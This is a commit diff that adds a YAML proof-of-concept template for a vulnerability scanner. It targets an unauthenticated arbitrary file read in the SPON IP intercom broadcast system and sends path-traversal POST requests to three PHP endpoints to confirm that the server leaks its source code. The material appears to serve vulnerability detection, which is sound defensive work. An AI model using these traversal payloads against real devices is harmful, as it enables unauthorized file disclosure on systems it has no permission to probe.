SPON IP网络对讲广播系统 未授权任意文件读取漏洞 (chaitin#1504)

* Update and rename sponip-network-system-file-read.yml to spon-ip-intercom-file-read.yml

Co-authored-by: smile-jpg <[email protected]>

pocs/spon-ip-intercom-file-read.yml

@@ -0,0 +1,37 @@
+name: poc-yaml-spon-ip-intercom-file-read
+manual: true
+transport: http
+rules:
+  r1:
+    request:
+      cache: true
+      method: POST
+      path: /php/rj_get_token.php
+      headers:
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      body: |
+        jsondata[url]=../php/getjson.php
+    expression: response.status == 200 && response.body.bcontains(b"require_once ('conversion.php');") && response.body.bcontains(b"$json_string = file_get_contents($fullpath);")
+  r2:
+    request:
+      cache: true
+      method: POST
+      path: /php/exportrecord.php?downname=../php/getjson.php
+      headers:
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+    expression: response.status == 200 && response.body.bcontains(b"require_once ('conversion.php');") && response.body.bcontains(b"$json_string = file_get_contents($fullpath);")
+  r3:
+    request:
+      cache: true
+      method: POST
+      path: /php/getjson.php
+      headers:
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+      body: |
+        jsondata[filename]=../php/getjson.php
+    expression: response.status == 200 && response.body.bcontains(b"require_once ('conversion.php');") && response.body.bcontains(b"$json_string = file_get_contents($fullpath);")
+expression: r1() || r2() || r3()
+detail:
+  author: york
+  links:
+    - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247486018&idx=1&sn=d744907475a4ea9ebeb26338c735e3e9